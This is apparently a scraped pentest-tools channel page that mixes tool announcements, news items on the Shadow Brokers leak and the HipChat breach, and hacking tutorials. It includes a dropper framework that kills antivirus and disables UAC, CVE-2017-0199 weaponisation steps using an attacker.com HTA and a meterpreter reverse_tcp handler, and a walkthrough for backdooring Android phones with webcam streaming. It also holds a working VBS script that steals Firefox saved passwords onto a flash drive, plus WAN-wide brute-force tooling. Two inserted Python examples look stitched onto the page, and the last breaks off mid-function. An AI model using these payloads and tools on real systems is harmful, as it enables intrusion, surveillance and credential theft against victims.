Channel: HACK4NET 🤖 Pentest Tools and News

DevAudit: Development Auditing for DevOps

Screenshot of DevAudit package source audit
Screenshot of DevAudit configuration audit
DevAudit is an open-source, cross-platform, multi-purpose security auditing tool targeted at developers and DevOps practitioners that detects security vulnerabilities at multiple levels of the solution stack. DevAudit provides a wide array of auditing capabilities that automate security practices and implementation of security auditing in the software development life-cycle. DevAudit can scan your operating system and application package dependencies, application and application server configurations, and application code, for potential vulnerabilities based on data aggregated by OSS Index from a wide array of sources and data feeds such as the National Vulnerability Database (NVD) CVE data feed, the Debian Security Advisories data feed, Drupal Security Advisories, and several others. Support for other 3rd party vulnerability databases like vulners.com is also planned.
DevAudit helps developers address at least 3 of the OWASP Top 10 risks to web application development:
as well as risks classified by MITRE in the CWE dictionary, such as CWE-2 Environment and CWE-200 Information Disclosure.
As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists like Injection and XSS. With the focus on web and cloud and distributed multi-user applications, software development today is increasingly a complex affair with security issues and potential vulnerabilities arising at all levels of the stack developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating implementation of development security reviews and best practices at all levels of the solution stack, from library package dependencies to application and server configuration to source code.
  • Cross-platform, with a Docker image also available.
  • CLI interface.
  • Continuously updated vulnerability data.
  • Audit operating system and development package dependencies.
  • Audit application server configurations.
  • Audit application configuration.
  • Audit application code by static analysis.
  • Remote agentless auditing.
  • Docker container auditing.
  • PowerShell support.
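As an added illustration of the package-dependency audit described above (example code written for this page, not DevAudit's own source): it parses a pinned requirements file and checks every pin against an advisory feed using half-open affected ranges. DevAudit pulls its advisories from OSS Index; here the feed, the package names, versions and advisory ids are a constructed in-memory sample so the check runs offline.

```python
"""Offline dependency audit in the spirit of DevAudit's package audit.

Added example, not DevAudit's code.  The advisory feed below is a small
constructed in-memory list (DevAudit itself queries OSS Index); package
names, versions and advisory ids are made up for the example.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of a pinned requirements file (not from the page).
REQUIREMENTS_TXT = """\
# pinned dependencies (constructed sample)
requests==2.18.0
django==1.11.2
pyyaml==3.12
six==1.11.0
"""

# Constructed advisory feed: package -> list of (advisory id, introduced, fixed).
# fixed == None means no fixed release is known, so every version from
# 'introduced' upward counts as affected.
ADVISORIES: Dict[str, List[Tuple[str, str, Optional[str]]]] = {
    "requests": [("ADV-EXAMPLE-0001", "2.3.0", "2.20.0")],
    "django": [("ADV-EXAMPLE-0002", "1.11", "1.11.3"),
               ("ADV-EXAMPLE-0003", "2.0", "2.0.2")],
    "pyyaml": [("ADV-EXAMPLE-0004", "0", None)],
}

REQ_LINE = re.compile(r"^\s*([A-Za-z0-9_.\-]+)\s*==\s*([0-9][0-9A-Za-z.\-]*)")


def parse_requirements(text: str) -> Dict[str, str]:
    """Return {normalised package name: pinned version} for '==' pins.

    Comments, blank lines and unpinned specifiers are skipped; names are
    lower-cased and '_' is folded to '-' so they match the feed keys.
    """
    pins: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        m = REQ_LINE.match(line)
        if m:
            pins[m.group(1).lower().replace("_", "-")] = m.group(2)
    return pins


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric-only comparison key; '1.11' and '1.11.0' compare equal."""
    parts: List[int] = []
    for piece in re.split(r"[.\-]", v):
        m = re.match(r"\d+", piece)
        if not m:          # stop at the first non-numeric piece (rc1, b2, ...)
            break
        parts.append(int(m.group(0)))
    while parts and parts[-1] == 0:   # drop trailing zeros: 1.11.0 -> 1.11
        parts.pop()
    return tuple(parts)


def is_affected(version: str, introduced: str, fixed: Optional[str]) -> bool:
    """True when version lies in the half-open range [introduced, fixed)."""
    v = parse_version(version)
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def audit(pins: Dict[str, str],
          feed: Dict[str, List[Tuple[str, str, Optional[str]]]] = ADVISORIES
          ) -> List[dict]:
    """Match every pinned package against the feed and list the hits."""
    findings = []
    for name, version in sorted(pins.items()):
        for adv_id, introduced, fixed in feed.get(name, []):
            if is_affected(version, introduced, fixed):
                findings.append({"package": name, "version": version,
                                 "advisory": adv_id, "fixed_in": fixed})
    return findings


if __name__ == "__main__":
    for f in audit(parse_requirements(REQUIREMENTS_TXT)):
        fix = f["fixed_in"] or "no fixed release known"
        print(f"{f['package']}=={f['version']}: {f['advisory']} (fixed in {fix})")
```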


Installation

DevAudit can be installed by the following methods:
  • Building from source.
  • Using a binary release archive file downloaded from Github for Windows or Linux.
  • Using the release MSI installer downloaded from Github for Windows.
  • Using the Chocolatey package manager on Windows.
  • Pulling the ossindex/devaudit Docker image from Docker Hub on Linux.

Does The Government Spy On You?

Sniffing GSM traffic with HackRF


GOOD LUCK!

Tools used:
Install Requirements:
First thing, you want to make sure you have all the required software installed, you can install most of them and their dependencies using your distribution package manager. Let’s start with the libraries and tools for the hackrf itself, on a Debian/Ubuntu distro you’ll install them like so:
sudo apt-get install hackrf libhackrf-dev libhackrf0
Once these libraries are installed, you can plug your hackrf into one of your USB ports and execute the hackrf_info command, at this point you should see something like the following:
# hackrf_info

Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0x00574746 0x00574746
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f4339e1
You will now install gnuradio which is the software we’ll use to decode the RF signals, gqrx a tool to visualize signal power on certain frequencies and everything else that will be needed in the next steps:
sudo apt-get install gnuradio gnuradio-dev gr-osmosdr gqrx-sdr wireshark
Proceed with gr-gsm, the GnuRadio blocks that will decode GSM packets:
sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
git clone https://github.com/ptrkrysik/gr-gsm.git
cd gr-gsm
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
Now create the file ~/.gnuradio/config.conf and paste the following contents into it:
[grc]
local_blocks_path=/usr/local/share/gnuradio/grc/blocks
Finally install kalibrate-hackrf, a tool that will hop among known GSM frequencies and will tell you which your country is using:
git clone https://github.com/scateu/kalibrate-hackrf.git
cd kalibrate-hackrf
./bootstrap
./configure
make
sudo make install
Finding GSM Frequencies:
Each operator in each country uses a different frequency in the GSM spectrum, which usually starts from 900 MHz. You can use hackrf_kalibrate (the kal binary built above) to find the frequencies you want to sniff:
./kal -s GSM900 -g 40 -l 40
Note the two gain values, those are important in order to get some results. Leave kalibrate running and after a while you should see an output similar to this:
kalibrate
You will have to use the proper GSM parameter (‘-s’) to correspond to your local operator. Consult this list for verification.
Sometimes you might want to see the frequencies in order to ensure correct results from hackrf_kalibrate, or to save yourself from calculating the correct frequency given by hackrf_kalibrate (notice the +/- kHz offset on each result: it marks the top peak with the corresponding power, not the exact frequency). Open gqrx and tune it to the first frequency you got from hackrf_kalibrate, for example 940.6 MHz, and you'll see something like the following picture:
Waterfall
In the above screenshot you can visually see that the activity is around 945 MHz.
Once you know the GSM channel frequencies, you can start gr-gsm by running the python script ./airprobe_rtlsdr.py or by loading the airprobe_rtlsdr.grc file in gnuradio-companion, and set one of the channel frequencies you just found in the frequency field. Don't forget to add the 'gain' value again, then move back to the frequency field and press the UP/DOWN arrows on your keyboard to step through the frequencies in 200 kHz increments until you start seeing some data in your console window. The whole process should look something like this:
gr-gsm
Now you only need to launch wireshark from another terminal tab with the following command:
sudo wireshark -k -Y 'gsmtap && !icmp' -i lo
If gr-gsm did its job, you should be able to see decoded GSM traffic sniffed by your hackrf.
Wireshark

Things to do with RTL-SDR



As interest in SDR grows unabated and we continue to see ever more affordable hardware platforms, I thought it would be timely to round up just a few of the things that it can be used for. This is by no means an attempt at an exhaustive list, and the software implementations covered are open source, since this means they are accessible to all, and proprietary SDR is a whole other world anyway!

1. Receive broadcast radio

Ettus Research, the folks behind what has come to be regarded as the grandaddy of affordable wideband SDR hardware platforms: the USRP, have put together a video tutorial in which they demonstrate how you can create an FM receiver application in under 10 minutes. This is based on using GNU Radio and its excellent graphical tool, GNU Radio Companion (GRC).
Of course, you don't need hardware anywhere near as capable as a USRP for this, and the low cost RTLSDR receiver hardware I wrote about back in May 2012 could also be used.

2. Amateur radio


As you might expect radio hams are doing a lot of work with SDR and there are plenty of options available. Ranging from the popular, low cost and simple to understand SoftRock SDR hardware, up to the modular and incredibly flexible High Performance Software-Defined Radio (HPSDR) project that I first wrote about in November 2010.
In addition to using hardware that has been designed with amateur radio use in mind, it's also possible to use something such as a USRP or RTLSDR receiver, depending on whether you need a transceiver or receive-only, and the required frequency coverage and dynamic range etc.
When it comes to software there are applications which are based on GNU Radio, such as the popular Gqrx receiver, along with many others that are based on the much simpler DttSP project.

3. Radio astronomy

Image © Marcus D. Leech
Marcus Leech of Science Radio Laboratories published a paper [PDF] entitled “A 21cm Radio Telescope for the Cost-Conscious”, in which he describes how this can be built using RTLSDR hardware along with other low cost and easily sourced components, with the option of using an Ettus Research USRP B100 + WBX daughter card for improved performance.
The GNU Radio-based simple_ra application which has been created for use with the system collects total power and spectral data in real-time, and for more information see the README file.

4. Track ships via AIS transmissions

A screen capture from aprs.fi
Automatic Identification System (AIS) is an automatic tracking system employed by ships to identify and locate vessels, which is used to supplement marine radar.
There are a number of options available for receiving and decoding AIS data, and one which uses RTLSDR hardware with a GNU Radio-based receiver plus gnuais is described in a blog post by Alexandru Csete, who also happens to be the author of the aforementioned Gqrx software.
Using this AIS messages can be logged, plotted, and fed to the Google Maps-based aprs.fi service.

5. Track aircraft via Mode S transmissions

Mode S is similar in purpose to AIS, albeit for aircraft. Once again the humble RTLSDR hardware can be used for receiving transmissions, and in July of last year I described how the gr-air-modes software can be used for this purpose and with aircraft positions plotted in Google Earth.

6. Set up a DRM transmitter

That's not DRM as in Digital Rights Management, but rather instead Digital Radio Mondiale — the set of digital radio technologies designed for use with shortwave AM broadcasting.
A DRM implementation was created by a student as part of GNU Radio's participation in Google Summer of Code 2012. The gr-drm software is fully integrated with GNU Radio Companion and, together with a USRP, can be used to create a DRM/DRM+ transmitter.

7. Build a GSM network

A Fairwaves GSM base station which uses UmTRX, installed at a festival
When it comes to creating a GSM network using open source SDR there are two software options: OpenBTS and OsmoBTS. The former has been around the longest and is used with a software switch such as Asterisk to essentially turn mobile handsets into SIP/VoIP endpoints.
OsmoBTS provides layers 1-3 of a GSM base station and can be used with the transceiver component from OpenBTS, to provide a fully open source implementation which may be used with Asterisk, or integrated with a traditional GSM network architecture using the Abis protocol.
Supported hardware includes the USRP, the development kit from Range Networks and UmTRX. The latter is a dual-channel open source hardware design intended for use in carrier networks.

8. Experiment with LTE

Image source: openLTE project
It's much earlier days as far as open source LTE (4G mobile) is concerned, but there are currently two partial implementations. gr-lte is a modular GNU Radio-based environment for an LTE downlink receiver, and openLTE provides GNU Octave code for test simulation along with GNU Radio applications. The latter includes downlink scanner and recorder applications which have hardware support for RTLSDR and HackRF.

9. Learn how Global Navigation Satellite Systems work

Image source: GNSS-SDR project
The GNSS-SDR software is described as being “focused on signal processing, understood as the process between the ADC and the computation of code and phase observables that allow the application of high-accuracy positioning algorithms”. Furthermore, it “allows you to control all the process inside a GNSS receiver, from the raw bits at the output of an analog-to-digital converter to the computation of the navigation solution, that is, obtaining receiver’s position and time.”
By providing a working implementation and opening up baseband processing which is usually done inside an IC, GNSS-SDR makes a great platform for learning about and developing navigation systems.

10. Invent the wireless future!

This post barely scratches the surface when it comes to what can be done using SDR, and with open source implementations of one degree or another of current standards such as 802.11, ZigBee and Bluetooth also, there are plenty of relevant codebases to learn from. On top of which tools such as GNU Radio Companion when combined with low cost wideband SDR hardware make it easier, faster and increasingly affordable to prototype next generation wireless applications.

Dr0p1t-Framework - A framework that creates a dropper


Features

  • Framework works with Windows and Linux
  • Downloads an executable on the target system and executes it silently
  • The executable size is small compared to other droppers generated the same way
  • Self-destruct function so that the dropper will kill and delete itself after finishing its work
  • Adding the executable to startup after downloading it
  • Adding the executable to the task scheduler after downloading it (UAC does not matter)
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have chosen before running the executable
  • The ability to disable UAC
  • When running powershell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
  • Choosing an icon for the dropper after creating it

Screenshots

On Windows

 

On Linux (Backbox)

 

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x; the recommended version for Python 3 is 3.5.x. Don't use 3.6 because it's not supported yet by PyInstaller.
  • Python libraries requirements in requirements.txt

Needed dependencies for linux

  • Wine
  • Python 2.7 on Wine Machine
Note: You must have root access.

Installation

If you are on Linux, run:
git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
If you are on Windows, download it and then run:
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
The libraries in windows_requirements.txt are used to enable Unicode output on Windows, which makes the coloring possible 😄

Tested on:

  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Pybelt - an open source hacker's tool belt complete with


  • A port scanner
  • SQL injection scanner
  • Dork checker
  • Hash cracker
  • Hash type verification tool
  • Proxy finding tool
  • XSS scanner


It is capable of cracking hashes without prior knowledge of the algorithm, scanning ports on a given host, searching for SQLi vulnerabilities in a given URL, verifying that your Google dorks work like they should, verifying the algorithm of a given hash, scanning a URL for XSS vulnerability, and finding usable HTTP proxies.




xsscrapy - XSS/SQLi Spider


Fast, thorough, XSS/SQLi spider. Give it a URL and it'll test every link it finds for cross-site scripting and some SQL injection vulnerabilities. 

From within the main folder run: 
./xsscrapy.py -u http://example.com

If you wish to login then crawl: 
./xsscrapy.py -u http://example.com/login_page -l loginname

If you wish to login with HTTP Basic Auth then crawl: 
./xsscrapy.py -u http://example.com/login_page -l loginname --basic

If you wish to use cookies: 
./xsscrapy.py -u http://example.com/login_page --cookie "SessionID=abcdef1234567890"

If you wish to limit simultaneous connections to 20: 
./xsscrapy.py -u http://example.com -c 20

Dependencies 
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
pip install -r requirements.txt


If it gives the error "ImportError: cannot import name LinkExtractor", you don't have the latest version of scrapy. You can install it using: sudo pip install --upgrade scrapy

It's called XSScrapy, so why SQL injection detection too? There is overlap between dangerous XSS characters and dangerous SQL injection characters, namely single and double quotes. Detecting SQL injection errors in a response is also simple and not CPU-intensive. So although 99% of this script is strongly geared toward high and accurate detection of XSS, adding simple SQL injection detection through error message discovery is a simple and effective addition.

This script will not test for blind SQL injection. The error messages it looks for come straight from w3af's sqli audit plugin.

RC-EXPLOITER v1.1.7 - resource file services exploiter


DISCLAIMER:

The author does not hold any responsibility for the bad use of this script. Remember that attacking targets without prior consent is illegal and punishable by law; this script was built to show how msf resource files can automate tasks.

Scanning WAN networks in search of targets may take 10 to 15 minutes depending on your network connection, and will search 1024 random hosts for the selected service/port. The file ‘brute.txt’ may be edited to insert new entries, or you can provide the full path to another dictionary file to be used in brute-forcing services.

Additional tool settings can be configured just by editing the ‘settings’ file (nano settings) before running the tool. Settings like use decoys (when scanning WAN networks) or spoof MAC address (change MAC address and IP address) can only be configured before running the tool.



Features:

1º – scan the WAN for the selected port (service) open
2º – port the hosts found to the msf database and set global variables (msfdb.rc)
3º – run the corresponding exploit.rc (e.g. ssl.rc) against all RHOSTS set before.
Workflow:
1º this script will ask the operator to input the port number to search
2º then it uses nmap to search WAN networks for the specified open port
3º it builds a resource file (.rc) to port the targets found to the msf database
4º it starts the msf db and launches the corresponding exploit.rc file against all targets

Note:

“all ‘exploits.rc’ will use nmap nse script engine and msf auxiliary modules to exploit the target And each discovered matching login and password will create a Metasploit session”.

DOWNLOAD & INSTALL
1º - Download framework from github
tar.gz OR zip OR git clone

2º - Set file execution permissions
cd RC-exploiter
sudo chmod -R +x *.sh

4º - Run main tool
nano settings
sudo ./rc-exploiter.sh

GITHUB PROJECT


Certified Ethical Hacker v9 Training {Free}



This is the world's most advanced ethical hacking course, with 18 of the most current security domains any ethical hacker will ever want to know when they are planning to beef up the information security posture of their organization. In 18 comprehensive modules, the course covers 270 attack technologies commonly used by hackers.


CVE-2017-0199: Microsoft Office Word RTF RCE vulnerability


What is CVE-2017-0199?

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.”

Exploit

  1. Download cve-2017-0199_toolkit
  2. Generate malicious RTF file using following command and send it to victim
    Syntax:
    # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    Example:
    # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

  3. (Optional, if using MSF Payload) : Generate metasploit payload and start handler
    Example:
    Generate Payload:
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    Start Handler:
    # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

  4. Start toolkit in exploitation mode to deliver payloads
    Syntax:
    # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    Example:
    # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

DEMO

Note

This program is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (bhdresh) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs.

Reference

https://github.com/bhdresh/CVE-2017-0199

Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.

Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, which allegedly belonged to the NSA's Equation Group.

What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.

Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.

Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.

A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.

The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.

Therefore, to compromise a machine, it must be running a vulnerable version of Windows with an SMB service exposed to the attacker.

Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.

Once installed, DoublePulsar used hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, preventing it from persisting after an infected PC is rebooted.

While Microsoft has already patched the majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.

Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer receive security updates, are also vulnerable to the in-the-wild exploits.

Since it takes hackers only a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver the exploits, researchers are expecting more vulnerable and unpatched computers to fall victim to DoublePulsar.

After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."

Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.

written by Swati Khandelwal

Blindy - Simple Script for running BruteForce Blind MySql Injection


Simple script for running bruteforce blind MySql injection
The script will run through queries listed in sets in provided file (default-queries.json as default) and try to bruteforce places with {} placeholder. If no {} placeholder present, the script will simply make request with current query.

command line
$ python3 blindy.py --help
usage: blindy.py [-h] [-f filename] [-m method] -p name -r regexp -u url
[-s set_of_queries]

Run blind sql injection using brutforce

optional arguments:
-h, --help show this help message and exit
-f filename File name for your commands in json format, defaults
to default-queries.json
-m method, --method method
Where to inject (GET - get parameter/default, POST -
post parameter, HEADER - header)
-p name Name of parameter (for get - param name, post - param
name, for header - name of header). If params need to
have fixed value use -p submit=true
-r regexp Regular expression for negative pattern (script search
for the pattern and if present - will consider that
injection failed and igrone result.)
-u url Url to test
-s set_of_queries, --set set_of_queries
Which set of queries to analyze from json file, for
ex. login, blind. Default to blind.

Example usage
Bruteforce inject into POST query_param
python3 blindy.py -m POST -p query_param -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
Bruteforce inject into POST query_param with placeholder
python3 blindy.py -m POST -p "query_param=login {}" -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
This will inject the queries in a place of {} parameter placeholder
Simple check a list of queries against username parameter
python3 blindy.py -m POST -p username -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/login.php -s login


How to Hack Android Devices Using Metasploit

In this tutorial, I'll be teaching you how to hack Android devices such as phones and tablets using Metasploit.
I'm going to be using Sana (Kali 2.0) for this tutorial, but you're welcome to use any distro you want as long as it can run Metasploit.
This is very easy to do - simply follow the below steps and you should be good to go.

Part 1: Generating The Payload

To generate the payload, open up a terminal and type in the following commands:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.225 LPORT=444 R > randomfile.apk

Here, android/meterpreter/reverse_tcp is the name of the payload we're going to be using. LHOST is the IP address to which the client is going to connect (your IP address). To find it, open up a new terminal and type in ifconfig. Your IP address will be where I've highlighted the text:

LPORT can be essentially any valid port number on your machine, you just need to make sure that it's not currently in use.

Replace RandomFile.apk with your file name.

...Hit ENTER and your payload should be generated successfully.
The apk file that was generated is the one you want the target device to run. This may require some social engineering skills, I'll just leave that to you.

Part 2: The Exploit
Once the payload has been successfully transferred to the target device, we need to start listening on the specified address and port to exploit the device.
For this, let's open up the Metasploit console.

Enter the following commands:


service postgresql start
msfconsole


That's going to open up the Metasploit console.

Now we want to use a payload handler for handling our reverse TCP connection. For this, type the following in the Metasploit terminal:

use multi/handler

You should now have a prompt which says exploit(handler). Awesome, now let's set the options. To do that, enter the following commands:


set PAYLOAD android/meterpreter/reverse_tcp
set LHOST Your_IP
set LPORT Port_Number


Replace the required info with yours in the above commands.

Now type the following command and verify all the options:

show options


This is what my configuration looks like:

If you're certain all the options are valid, enter the following command to start the handler (listening):
exploit

As soon as the device executes the payload (opens the app), your Meterpreter terminal should say "Meterpreter session one opened" or something of that sort.
This means you have successfully gained access to the device.

To view the list of available commands, just put a question mark (?) and hit ENTER.
To use a command, simply type the name of the command and hit ENTER. If it requires any parameters, it will mention that.

Some useful commands:
To stream video from the device's camera live, use the following command:
webcam_stream


To download/upload files from/to the device:
download/upload %FILEPATH%

Over The Internet

In the above case, everything was attempted on a local network.
In case you wish to do this over the internet, follow the same steps. Instead of using ifconfig, use the following command:
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com


You would also need to enable port forwarding on your router for it to work over the internet.

Enjoy Hacking!

Grab Firefox Session From Flash Drive | Windows [Passwords/History]

The following code can be run from a flash drive as 'worm'.vbs. It will copy the user profile folder containing all information from the user's Firefox sessions, including stored passwords.

Once copied, the user profile folder can replace an existing user profile folder on another computer and the session will restore with saved passwords, submission forms, history, and bookmark information as it was on the computer you grabbed it from.



' Canidison
' By Jar Jar Binks
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Createobject("wscript.shell")
WshShell.CurrentDirectory = "c:\"
If objFSO.FolderExists("C:\Users\All Users\Appdata") Then
WScript.Quit()
End if
Set objFolder = objFSO.CreateFolder("C:\Users\All Users\Appdata")
outFile0=("C:\Users\All Users\cookies.bat")
Set objFile = objFSO.CreateTextFile(outFile0,True)
objFile.Write "cd %appdata%"& vbCrLf
' Replace D: With whatever drive letter applies
objFile.Write "xcopy /s Mozilla\Firefox\Profiles\* ""D:"""
objFile.Close
CreateObject("WScript.Shell").Run("""C:\users\All users\cookies.bat"""), 0, true
outFile66=("C:\Users\All Users\delete.vbs")
Set objFile = objFSO.CreateTextFile(outFile66,True)
objFile.write "Set objFSO = CreateObject(""Scripting.FileSystemObject"")"& vbCrLf
objFile.write "objFSO.DeleteFolder(""C:\Users\All Users\Appdata"")"& vbCrLf
objFile.write "objFSO.DeleteFile(""C:\Users\All Users\Cookies.bat"")"& vbCrLf
objFile.write "objFSO.DeleteFile(""C:\Users\All Users\delete.vbs"")"
objFile.close
CreateObject("WScript.Shell").Run("""C:\users\All users\delete.vbs"""), 0, false

The folder copied to your flash drive will be something like 'dnh8gkr0.default'. To replace your own Firefox user profile with the copied profile, press Windows+R, type %appdata%, and hit Enter.

Go to Mozilla\Firefox\Profiles\ and copy the name of your own profile (which will be something like dnh8gkr0.default), then rename the folder on your flash drive to what's on your clipboard.

Now destroy your own folder and replace it with the folder on your flashdrive. Follow all these steps and open Firefox. You will be prompted to restore session. Restore session.

Boom. Saved passwords, saved form documents and history. This is to be used only as a means to transfer your own Firefox profiles. Furthermore, I am not responsible for your actions.

"For Educational Purposes Only"

Atlassian’s HipChat hacked; user info, messages, and content possibly accessed

Atlassian's group chat platform HipChat is notifying its users of a data breach after some unknown hacker or group of hackers broke into one of its servers over the weekend and stole a significant amount of data, including group chat logs.

What Happened?

According to a security notice published on the company's website today, a vulnerability in a "popular third-party" software library used by its HipChat.com service allowed hackers to break into its server and access customer account information.

However, HipChat did not say exactly which programming blunder the hackers exploited to get into the HipChat cloud server.


What type of Information?

Data accessed by the hackers include user account information such as customers' names, email addresses and hashed password information.

Besides information, attackers may have obtained metadata from HipChat "rooms" or groups, including room name and room topic. While metadata is not as critical as direct messages, it's still enough to identify information that's not intended to be public.

Worse yet, the hackers may also have stolen messages and content in chat rooms, but in a small number of instances (about 0.05%). There has been no sign that over 99% of users' messages or room content was compromised.

Fortunately, there's no evidence that the attackers have accessed anyone's credit card or financial information.

Who is not affected?

HipChat users not connected to the affected third-party software library are not affected by the data breach.

Other Atlassian properties also are safe, as the company claimed that there is no evidence to suspect that other Atlassian systems or products like Jira, Confluence, or Trello have been affected by the hack.

To Worry or Not to Worry?

There's no need to panic, as the passwords that may have been exposed in the breach would also be difficult to crack.

Atlassian Chief Security Officer Ganesh Krishnan noted that HipChat hashes all passwords using the bcrypt cryptographic algorithm, with a random salt.

The data is hashed with bcrypt, which transforms the passwords into a set of random-looking characters, and makes the hashing process so slow that it would literally take centuries to brute-force all of the HipChat account passwords.

For added security, HipChat also "salted" each password with a random value before hashing it, adding additional protection against possible decryption.

However, data breaches like this are made worse by the fact that there have been so many breaches prior to it, and that the majority of users use the same or similar passwords for their multiple accounts.

So, it doesn't take much for hackers to cross-reference a user's username or email address in a database from a previous breach and find an old password, placing users at greater risk of a hack.
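As an added example (not from the article or from Atlassian), the two properties described above, a per-user random salt and a deliberately slow hash, are shown with Python's standard-library PBKDF2-HMAC, which stands in for bcrypt here because bcrypt is not in the standard library; the reuse audit at the end is the check a service would run to find accounts whose password also appeared in an earlier breach. All user names, passwords and the "earlier breach" list are constructed.

```python
import hashlib
import hmac
import os
import time

# Work factor. PBKDF2 counts iterations; bcrypt expresses the same idea as a cost exponent.
ITERATIONS = 200_000


def hash_password(password, iterations=ITERATIONS, salt=None):
    """Return a self-describing record: pbkdf2$<iterations>$<salt hex>$<digest hex>.

    The salt is 16 fresh random bytes per password, so two users who chose the
    same password end up with unrelated records.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the digest with the stored salt and work factor; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != "pbkdf2":
        raise ValueError("unknown hash scheme")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def same_password_distinct_records(password):
    """True when hashing the same password twice yields different records (the salt at work)."""
    return hash_password(password) != hash_password(password)


def seconds_per_guess(iterations):
    """Wall-clock cost of one guess at the given work factor: this is what slows brute force."""
    salt = os.urandom(16)
    start = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", b"guess", salt, iterations)
    return time.perf_counter() - start


def reuse_audit(records, leaked_passwords):
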